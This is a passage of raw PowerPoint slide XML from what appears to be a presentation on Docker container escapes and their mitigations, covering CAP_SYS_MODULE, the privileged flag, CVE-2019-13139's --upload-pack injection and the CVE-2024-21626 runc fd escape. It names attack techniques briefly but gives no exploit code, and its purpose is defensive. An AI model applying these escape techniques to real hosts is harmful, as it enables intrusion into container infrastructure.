                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5B2A3C2A-7511-C361-F95F-4CE35AF72C25}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0" anchor="t">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-SA"/>
              <a:t>In this attack, CAP_SYS_MODULE capability was exploited to do the attack. So, one of the mitigation ways can be to remove the capability from a docker container. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Here the docker container by default run without any capabilities. </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Footer Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4AAF7A11-097B-5681-34AE-2126B24A33E1}"/>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359A8B6-388B-6BB1-45B0-23C734F120A1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8610600" y="6871357"/>
            <a:ext cx="2743200" cy="365125"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{0907522C-281B-B84D-9D16-8693EEE2C7CE}" type="slidenum">
              <a:rPr lang="en-SA" smtClean="0"/>
              <a:t>65</a:t>
            </a:fld>
            <a:endParaRPr lang="en-SA"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Picture 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{81060104-7B92-A94F-26CA-350D7C449603}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3603251" y="3328988"/>
            <a:ext cx="4111438" cy="289672"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3203319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422F-EDEF-A19D-CDB3-6B4C878D154F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Container attack using privileged flag</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Content Placeholder 6" descr="A screen shot of a computer&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7550D8DB-78A1-5B65-C25F-517C977B1E07}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noGrp="1" noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2463054" y="3580232"/>
            <a:ext cx="6817658" cy="1727386"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Footer Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4AAF7A11-097B-5681-34AE-2126B24A33E1}"/>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359A8B6-388B-6BB1-45B0-23C734F120A1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8610600" y="6871357"/>
            <a:ext cx="2743200" cy="365125"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{0907522C-281B-B84D-9D16-8693EEE2C7CE}" type="slidenum">
              <a:rPr lang="en-SA" smtClean="0"/>
              <a:t>66</a:t>
            </a:fld>
            <a:endParaRPr lang="en-SA"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EB1256FD-B2DD-C81F-BD78-86FF2197F11A}"/>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Mitigation: Don't give the capability by default and the attack will be failed.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1219069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1">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>Docker socket misconfigurations</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" lvl="2" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3200">
                <a:solidFill>
                  <a:schemeClr val="bg1">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Contianer attack using privileged flag</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" lvl="2" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3200" b="0" i="0" u="none" strike="noStrike">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67</a:t>
            </a:fld>
            <a:endParaRPr lang="en-SA"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3379324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422F-EDEF-A19D-CDB3-6B4C878D154F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="4400" b="0" i="0" u="none" strike="noStrike">
                <a:effectLst/>
              </a:rPr>
              <a:t>Docker build code execution</a:t>
            </a:r>
            <a:endParaRPr lang="en-SA"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5B2A3C2A-7511-C361-F95F-4CE35AF72C25}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-SA"/>
              <a:t>In this attack, we can exploit </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1"/>
              <a:t>docker build’s</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-SA"/>
              <a:t> parameter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="0" i="0" u="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1"/>
              <a:t>--upload-pack=”” </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>to run system commands</a:t>
            </a:r>
            <a:endParaRPr lang="en-SA" i="1"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Footer Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4AAF7A11-097B-5681-34AE-2126B24A33E1}"/>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359A8B6-388B-6BB1-45B0-23C734F120A1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8610600" y="6871357"/>
            <a:ext cx="2743200" cy="365125"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{0907522C-281B-B84D-9D16-8693EEE2C7CE}" type="slidenum">
              <a:rPr lang="en-SA" smtClean="0"/>
              <a:t>68</a:t>
            </a:fld>
            <a:endParaRPr lang="en-SA"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="55298" name="Picture 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2E189DED-BA38-2BF3-3D8C-A630B121A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47057"/>
            <a:ext cx="79248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60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422F-EDEF-A19D-CDB3-6B4C878D154F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="4400" b="0" i="0" u="none" strike="noStrike">
                <a:effectLst/>
              </a:rPr>
              <a:t>Docker build code execution</a:t>
            </a:r>
            <a:endParaRPr lang="en-SA"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5B2A3C2A-7511-C361-F95F-4CE35AF72C25}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Mitigation: upgrade docker to the latest version</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Validate by reproduce the attack</a:t>
            </a:r>
            <a:endParaRPr lang="en-SA"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Footer Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4AAF7A11-097B-5681-34AE-2126B24A33E1}"/>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D359A8B6-388B-6BB1-45B0-23C734F120A1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8610600" y="6871357"/>
            <a:ext cx="2743200" cy="365125"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{0907522C-281B-B84D-9D16-8693EEE2C7CE}" type="slidenum">
              <a:rPr lang="en-SA" smtClean="0"/>
              <a:t>69</a:t>
            </a:fld>
            <a:endParaRPr lang="en-SA"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="57346" name="Picture 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5B1E6677-8F15-843C-3E69-0285799CC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2647731"/>
            <a:ext cx="59182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a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F85F146C-70FC-4F15-E7B7-E3F300CA9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827" y="4485837"/>
            <a:ext cx="7924800" cy="11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 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4400"/>
              <a:t>Breakout</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t>Docker socket misconfigurations</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" lvl="2" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3200">
                <a:solidFill>
                  <a:schemeClr val="bg2">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2">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:effectLst/>
              </a:rPr>
              <a:t>CVE-2019-13139 - Docker build code execution</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" lvl="2" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3200">
                <a:solidFill>
                  <a:schemeClr val="bg2">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>CVE-2024-21626 - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg2">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>runC</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200">
                <a:solidFill>
                  <a:schemeClr val="bg2">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>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7</a:t>
            </a:fld>
            <a:endParaRPr lang="en-SA"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="28632896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a:t>Patching</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285750" lvl="2" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3200">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>Docker socket misconfigurations</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" lvl="2" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3200">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>Privilege escalation using Volume Mount</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" lvl="2" indent="-285750"/>
            <a:r>
              <a:rPr lang="en-US" sz="3200">
                <a:solidFill>
                  <a:schemeClr val="bg2">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>Container escape using the exposed socket</a:t>
            </a:r>
            <a:endParaRPr lang="en-SA" sz="3200">
              <a:solidFill>
                <a:schemeClr val="bg2">
                  <a:lumMod val="75000"/>
                </a:schemeClr>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="285750" lvl="2" indent="-285750"/>
            <a:r>
              <a:rPr lang="en-US" sz="3200">
                <a:solidFill>
                  <a:schemeClr val="bg2">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>Container attack using privileged flag</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" lvl="2" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3200" b="0" i="0" u="none" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:effectLst/>
              </a:rPr>
              <a:t>CVE-2019-13139 - Docker build code execution</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" lvl="2" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3200"/>
              <a:t>CVE-2024-21626 - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" err="1"/>
              <a:t>runC</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200"/>
              <a:t> Escape Vulnerability</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" rtl="1">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="ar-SA" sz="3200">
              <a:solidFill>
                <a:schemeClr val="bg2">
                  <a:lumMod val="75000"/>
                </a:schemeClr>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" rtl="1">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-SA"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70</a:t>
            </a:fld>
            <a:endParaRPr lang="en-SA"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3688826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err="1"/>
              <a:t>runC</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4400"/>
              <a:t> Escape Vulnerability</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normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="457200" lvl="2" indent="-457200"/>
            <a:r>
              <a:rPr lang="en-SA" sz="2800"/>
              <a:t>To mitigate this vulnerability, update </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800"/>
              <a:t>any instances of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" err="1"/>
              <a:t>runc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800"/>
              <a:t> to version 1.1.12 or later, as well as any software that depends on </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" err="1"/>
              <a:t>runc</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2800"/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="2" indent="-457200">
              <a:spcBef>
                <a:spcPts val="1700"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1"/>
              <a:t>Always</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400"/>
              <a:t>ensure WORKDIR in your build's points to the container’s root filesystem.</a:t>
            </a:r>
            <a:endParaRPr lang="en-SA" sz="28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71</a:t>
            </a:fld>
            <a:endParaRPr lang="en-SA"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Picture 5" descr="A screen shot of a computer&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FE5CC3D2-97BB-3BFB-83D6-939FF9A12420}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3052203" y="4267760"/>
            <a:ext cx="6681507" cy="1448920"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="57395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a:xfrm>
            <a:off x="849406" y="174625"/>
            <a:ext cx="10515600" cy="1325563"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr rtl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="4400" err="1"/>
              <a:t>runC</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4400"/>
              <a:t> Escape Vulnerability</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a:xfrm>
            <a:off x="838200" y="1265331"/>
            <a:ext cx="10515600" cy="4351338"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0" anchor="t">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="457200" lvl="2" indent="-457200"/>
            <a:r>
              <a:rPr lang="en-US" sz="2800"/>
              <a:t>Verify the mitigation by reproduce the attack. In the update version of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" err="1"/>
              <a:t>runc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800"/>
              <a:t> we tried to run the attack with both the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" err="1"/>
              <a:t>fd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800"/>
              <a:t>/7 and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" err="1"/>
              <a:t>fd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800"/>
              <a:t>/8 interchangeably</a:t>
            </a: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72</a:t>
            </a:fld>
            <a:endParaRPr lang="en-SA"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Picture 5" descr="A screenshot of a computer&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{73B0A773-F566-8134-7877-DE1E63F97FD6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="840722" y="2675404"/>
            <a:ext cx="5019675" cy="352425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E0D76CB-60E6-C051-E3BF-A28A286AFCFB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6243357" y="2891398"/>
            <a:ext cx="5565961" cy="3114675"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Oval 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1FD63193-4FB4-0C1D-AD20-D17021807FAA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3134844" y="3440205"/>
            <a:ext cx="437029" cy="3697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494D82-4C36-4C79-7285-14E8EF41B1E7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9286873" y="3832411"/>
            <a:ext cx="437029" cy="3697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279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US" sz="4400" err="1"/>
              <a:t>runC</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4400"/>
              <a:t> Escape Vulnerability</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vert="horz" lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0" anchor="t">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="457200" lvl="2" indent="-457200"/>
            <a:r>
              <a:rPr lang="en-US" sz="2800"/>
              <a:t>Verify the mitigation by reproduce the attack, in every attempt the attack was unsuccessful.</a:t>
            </a:r>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73</a:t>
            </a:fld>
            <a:endParaRPr lang="en-SA"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="Picture 7" descr="A black background with white text&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C7B8B74D-975A-10D9-6ED5-20EE398426F9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="843803" y="3579719"/>
